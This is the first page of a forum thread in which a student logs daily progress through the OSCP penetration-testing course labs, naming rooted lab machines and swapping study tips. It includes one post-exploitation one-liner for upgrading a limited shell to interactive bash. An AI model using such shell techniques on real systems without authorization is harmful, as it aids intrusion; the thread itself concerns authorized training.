+ Reply to Thread
Page 1 of 4 1 234 Last
Results 1 to 25 of 82
  1. Member
    Join Date
    Jan 2016
    Posts
    56
    #1

    Default Starting OSCP - 31/1/16

    Hi guys, been lurking on this forum for a couple of weeks now. Got loads of help from some of the OSCP threads on here so thought I'd make my own.

    So my previous experience is mainly self-taught, I've done Sec+ and net+ courses, but not the exams due to other factors. My self taught skills lie in a broad spectrum, I enjoy RE and binary exploitation, pentesting, and a bit of forensics. I'd say my biggest weakness is web app hacking (going to spend the next few weeks getting up to scratch on this).

    Programming languages I'm confident with are C, python (use mainly for CTF's), java (for uni), and I can write pretty basic assembly from scratch (mainly for custom shellcode exploits).

    A few questions from people who've been there and done it:
    Did you guys take notes as you went through the course material (not the labs), I'm a heavy note taker, I tend to write notes by hand, then type them up at the end of the week. Reckon that'll be doable?

    How prevelant in the labs was web based hacking? It's (through my own fault) not my best area, obviously I look to improve on this.

    So thats pretty much me. I'm doing this mainly to learn, if I get a cert out of it at the end then its just a bonus. Cheers for reading, I'll update this as and when I feel I should.
    Reply With Quote Quote  

  2. SS -->
  3. Senior Member danny069's Avatar
    Join Date
    Nov 2012
    Location
    NYC
    Posts
    999

    Certifications
    A+, Security+, ACMT, CASP, CEH, CCNA R&S, A.S. & B.S. Cyber Security Systems/Digital Forensics, M.S. Cyber Security
    #2
    I can't chime in on the OSCP, but to me, it's a man's man cert. Hands on and technical. Just wanted to say welcome and good luck!
    I am a Jack of all trades, Master of None
    Reply With Quote Quote  

  4. Senior Member adrenaline19's Avatar
    Join Date
    Dec 2015
    Posts
    248
    #3
    I start in two days. Good luck to both of us!
    Reply With Quote Quote  

  5. You have an error in your
    Join Date
    Jul 2014
    Location
    Malta (EU)
    Posts
    21

    Certifications
    OSCP, Security+
    #4
    Quote Originally Posted by invictus_123 View Post
    How prevelant in the labs was web based hacking? It's (through my own fault) not my best area, obviously I look to improve on this.
    I wouldn't worry about it. The course material will teach you most of what you need to know about web app attacks. With your existing knowledge, you'll need less time to get through the exploit development material than the average student, which will leave you with enough time for the web app part.

    Have a look at the OWASP Top 10 and read up on what you don't understand. Practice a bit with something like WebGoat, Damn Vulnerable Web Application, or a web app focused vulnerable VM.
    Reply With Quote Quote  

  6. Member
    Join Date
    Jan 2016
    Posts
    56
    #5
    Quote Originally Posted by adrenaline19 View Post
    I start in two days. Good luck to both of us!
    Good luck
    Reply With Quote Quote  

  7. Member
    Join Date
    Jan 2016
    Posts
    56
    #6
    Quote Originally Posted by Liindolade View Post
    I wouldn't worry about it. The course material will teach you most of what you need to know about web app attacks. With your existing knowledge, you'll need less time to get through the exploit development material than the average student, which will leave you with enough time for the web app part.

    Have a look at the OWASP Top 10 and read up on what you don't understand. Practice a bit with something like WebGoat, Damn Vulnerable Web Application, or a web app focused vulnerable VM.
    Cheers for the info!
    Reply With Quote Quote  

  8. Member
    Join Date
    Jan 2016
    Posts
    56
    #7
    Day 1:
    So my pack arrived last night, I didn't start till this morning. Checked out the first two chapters, found them a good refresher on bash cmd line stuff etc.

    I then decided to have a quick taster on the labs, I've decided that although I want to get the materials done first, I want to spend at least one evening a week in the lab so I'm not wasting the lab time.

    Anyways, I scanned the entire network and then picked a target, .205. Found quite a few vulnerable services, quick google, found a metasploit module for one, boom system level priviledges. I don't feel bad for using metasploit on my first day, as I'm quite comfortable with exploit development I don't imagine finding it hard to copy and paste someone else's exploit.

    I guess I just really wanted to pop a shell on my first day to get rid of any nerves. I will be limiting my metasploit usage from now however.

    So for now its back to the pdf and videos. Day 1, 1 box rooted
    Reply With Quote Quote  

  9. Member
    Join Date
    Jan 2016
    Posts
    56
    #8
    Not sure if anyone is reading this but Im going to keep updating it every evening mainly to clear my head.

    So Day 2:
    I spent a bit of time on the lab guide, most of the first 2 chapters is a bit of a refresher for me as im familiar with the concepts, so Im just taking notes and will watch the videos at the end of each section.
    I'm finding the materials very clear and well put together, looking forward to hitting some stuff I'm not aware of.

    The lab:
    So I went back into the lab in between lectures at uni and picked another box to hit. I've decided my process just isn't methodical enough yet as I want to pwn everything straight away, and I end up going down some deep rabbit holes. This box was a clear example of that, I found a vulnerable service, and stopped enumerating the other services, I got a low priv shell but and could grab files, but due to the priviedges, I couldnt run any local exploits.

    After a while I decided to go back and do things properly, and hey presto, found a straight to root remote exploit. It was literally sitting right there all along. Lesson learnt. Rooted the box and will go back to pillage it tomorrow.

    Day 2 end, 2 systems rooted
    Reply With Quote Quote  

  10. Senior Member
    Join Date
    Nov 2012
    Location
    Montreal
    Posts
    588

    Certifications
    OSCP, CEH, SSCP, EJPT, CCNA:Security, CCNA:R&S, MCSA:W2K8, Linux+, LPIC-1, SCLA
    #9
    Quote Originally Posted by invictus_123 View Post
    Not sure if anyone is reading this but Im going to keep updating it every evening mainly to clear my head.
    I will be reading you daily Keep it up!

    Reply With Quote Quote  

  11. Junior Member Registered Member
    Join Date
    Feb 2016
    Location
    Earth
    Posts
    1

    Certifications
    CISSP, VCP, MCSA
    #10
    Yes please continue to update this thread.
    After i take the CISM i plan on tackling this exam and would love to have some recent feedback regarding the study process and exam.
    Reply With Quote Quote  

  12. Senior Member
    Join Date
    Apr 2011
    Location
    DMV
    Posts
    212
    #11
    Trust me, alot of people are following your progress - I included.
    Reply With Quote Quote  

  13. Member
    Join Date
    Jan 2016
    Location
    Malta
    Posts
    52

    Certifications
    A+, Net+, MCSE 2000, CCNA, eJPT, LPIC1, OSCP
    #12
    I think lots of people on here are interested and read every new post of every OSCP thread myself included! They are such good reads
    Reply With Quote Quote  

  14. Member
    Join Date
    Jan 2016
    Posts
    56
    #13
    Cheers guys! I read every post I could find as well, and I found it really helpful.

    Day 3:
    I made a point of staying out of the labs as far as attacking machines goes today. I went back and properly looted the box from yesterday. So far the two boxes I've rooted aren't really talking to anyone, dont have too much loot other than password files.

    The passwords seem to be pretty easy to crack, smashed 18/18 of them with the same wordlist, so thats nice.

    I'm on chapter 4 on the lab guide. So far, as i said before, its all a bit of a refresher. If you're about to do this course, then I would definately not get hung up on learning metasploit or any tools. Go and learn cmd line for linux AND windows. Learn about networking. The low level stuff is important.

    Boring update I'm afraid, I'll be far more active on the weekend.
    Anyone has any questions, whatever they may be, I'll do my best to answer them if i can.
    Reply With Quote Quote  

  15. Achieve excellence daily
    Join Date
    May 2012
    Location
    Washington State
    Posts
    1,340

    Certifications
    CISSP
    #14
    Thanks so much for this thread. I am starting in late March.
    When you go the extra mile, there's no traffic.
    Reply With Quote Quote  

  16. Senior Member
    Join Date
    May 2006
    Posts
    1,863

    Certifications
    CISSP, CCSP, eJPT, ITIL,PA ACE,Qualys Certified Specialist, A+
    #15
    Can you put the names of the boxes you are rooting or having problems with as you go along? A lot of people posting here do the same. Plus it gives us a sense of progression and sense of difficulty when we read and can associate a machine with its name. Will help you remeber stuff easier too if you track the machines by name instead of just box. Keep updating, everyone reads this.
    Reply With Quote Quote  

  17. Member
    Join Date
    Jan 2016
    Posts
    56
    #16
    Quote Originally Posted by TheFORCE View Post
    Can you put the names of the boxes you are rooting or having problems with as you go along? A lot of people posting here do the same. Plus it gives us a sense of progression and sense of difficulty when we read and can associate a machine with its name. Will help you remeber stuff easier too if you track the machines by name instead of just box. Keep updating, everyone reads this.
    Yeh of course. I'll try my best not to give any spoilers away. (its only day 4 today and I'm focusing on the lab guide, so its still at 2 boxes).

    So far Ive rooted mailMan (Easy if you enumerate properly) and oracle (same as mailMan). I'm currently stuck on ghost, found the code and used it, but only getting try harder messages. Will crack on again at some point tomorrow.
    Reply With Quote Quote  

  18. Member
    Join Date
    Sep 2015
    Posts
    83

    Certifications
    Old School MCSE, NET+, CEH, CISSP, GICSP, OSCP and SCADA Specific goodness
    #17
    Ghost is not considered an easy box, You might give some thought to targeting some others first, purely from a psychological standpoint of course you seem better prepared than most.
    Reply With Quote Quote  

  19. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #18
    I didn't think Ghost was all that difficult. That was one of the first boxes I targeted, after Bob of course.
    Just pay attention to the material and you should be able to compromise it.
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/
    Reply With Quote Quote  

  20. Member
    Join Date
    Sep 2015
    Posts
    83

    Certifications
    Old School MCSE, NET+, CEH, CISSP, GICSP, OSCP and SCADA Specific goodness
    #19
    Some people have problems with it, but Its all relative to your experience.
    Reply With Quote Quote  

  21. Member
    Join Date
    Jan 2016
    Posts
    56
    #20
    Quote Originally Posted by MrAgent View Post
    I didn't think Ghost was all that difficult. That was one of the first boxes I targeted, after Bob of course.
    Just pay attention to the material and you should be able to compromise it.
    I have enumerated it properly and have that code, sort of understand what it does, but not entirely sure how I can leverage it.

    update Day 5:
    So last night I spent ages on freeBSD, I didn't get a shell but I know how its vulnerable, just not how to exploit it (yet). Really feel I've stepped up my enumeration, I checked everything, in depth, and understand what I may need to do.

    Tonight has also been a good one. I am halfway through chapter 4 in the lab guide, and in the last 4 hours I rooted kraken, redHat and Ralph - these were obviously low hanging fruit, but I dont mind, I learnt a little bit from each box.

    A few things I've noticed so far:
    • If you're not sure where to start in the labs, check the forums, theres a page called threads organised by lab machine. Use the logic that the easier systems will have less posts (worked for me tonight).
    • If you try and compile an exploit in C and you get a million errors, check the type of error (I'm pretty solid with C so I'm ok but I can definately see this putting people off if they dont understand it). So far in almost every exploit ive had to compile, simply adding #include <stdlib.h> has corrected the errors.
    • I pinged an admin last night about freebsd, and he was reluctant at first when I asked about it. Until I explained what I had done, as soon as they know you have properly enumerated the system, they will be more inclined to push you in the right direction. If you haven't run every tool you can think of, don't bother pinging them.
    Day 5, 5 systems rooted
    Reply With Quote Quote  

  22. Member
    Join Date
    Oct 2015
    Posts
    64
    #21
    I have 5 or so systems rooted. I've used metasploit for all of them. I'm not sure how I feel about it. It feels cheap but at the same time I think it makes sense and the course says using metasploit is fine. Do you think it's beneficial to download PoC code and alter it?
    Reply With Quote Quote  

  23. Member
    Join Date
    Jan 2016
    Posts
    56
    #22
    Quote Originally Posted by Sch1sm View Post
    I have 5 or so systems rooted. I've used metasploit for all of them. I'm not sure how I feel about it. It feels cheap but at the same time I think it makes sense and the course says using metasploit is fine. Do you think it's beneficial to download PoC code and alter it?
    By all means use metasploit, but just remember it is limited in the exam. My personal advice would be to attempt to redo as many as you can without metasploit, it will really pay dividends if you know how to search for, compile and execute exploits.

    Update day 6:
    I managed to get a good bit of studying on in the lab guide, had a nice little refresher of nmap which I enjoyed. Its nice to get an expert view on security, like I never really thought about how much traffic you're putting down the pipe when you portscan.

    So I don't know if I mentioned, but I had attempted ghost the other day and got about a third of the way there. Well me and him went toe to toe tonight and I can proudly say I came out on top. I was on a bit of a roll and then got seriously stuck, I had the correct commands, and had everything set up correctly, but the response I was getting was zilch, nada. I checked wireshark and confirmed that something wasnt going how it should.

    This was the important part, before asking an admin for help, I checked every single possibility. It turns out that what I was missing was a gap in my knowledge about web servers and php. After I explained my predicament to an admin, he explained what was actually happening, which enabled me to change things around and boom, limited shell.

    The priviledge escalation from here was a bit strange. I kind of stumbled onto an exploit after checking a certain file, it took me ages to get it to work. Eventually I realised I was missing a step, and bang, root shell! only took 5 hours

    A quick pointer:
    • I am forever ending up with this crappy shells where you rarely get any stderror output (which is really important). This means for example, if you wanna compile an exploit victim side, you cant see any error messages.
    • You can use python for example to jailbreak the crappy shell with this simple one liner python -c 'import pty;pty.spawn("/bin/bash")' - this made all the difference tonight.
    Will go back and loot the two boxes I havent yet tomorrow (ralph and ghost). So thats it folks, day 6, 6 systems rooted
    Reply With Quote Quote  

  24. Member rudegeek's Avatar
    Join Date
    Apr 2015
    Location
    Denver
    Posts
    69

    Certifications
    GSEC, GCWN, CCNA R/S, Microsoft 70-410 MCP, Network +
    #23
    Good job bro! Keep pushing! Which machines have you pwnd so far?
    Reply With Quote Quote  

  25. Member
    Join Date
    Jan 2016
    Posts
    56
    #24
    Quote Originally Posted by rudegeek View Post
    Good job bro! Keep pushing! Which machines have you pwnd so far?
    Cheers mate. Off the top of my head I have oracle, redhat, ghost, sipserver, kraken, mailman and ralph.

    Update day 7:
    Had a busy day with uni work so just typed my oscp notes up and then spent a little time in the labs. I looted ghost, but I'll probably have to go back at some point and reloot a lot of the machines as I'm not too sure what to look for. I managed to root sipserver today as well, must have been low hanging fruit as it only took about half an hour lol

    I have also made some progress on jeff, which forced me to learn more web hacking (not my favourite thing), and I'm 90% of the way there with kevin, just got to modify an exploit as I think kevin has his firewall up lol (its important to understand the difference between a bind shell and reverse shell).

    Thats pretty much it today. I wont update tomorrow as Im doing purely notes and not lab, gotta rest sometime!
    Reply With Quote Quote  

  26. Senior Member
    Join Date
    Oct 2014
    Location
    Australia
    Posts
    177

    Certifications
    SSCP, CISSP, OSCP
    #25
    FREEBSD took me the longest so far, and in the end I'm sure I didn't do it the most elegant way possible.
    Reply With Quote Quote  

+ Reply to Thread
Page 1 of 4 1 234 Last

Social Networking & Bookmarks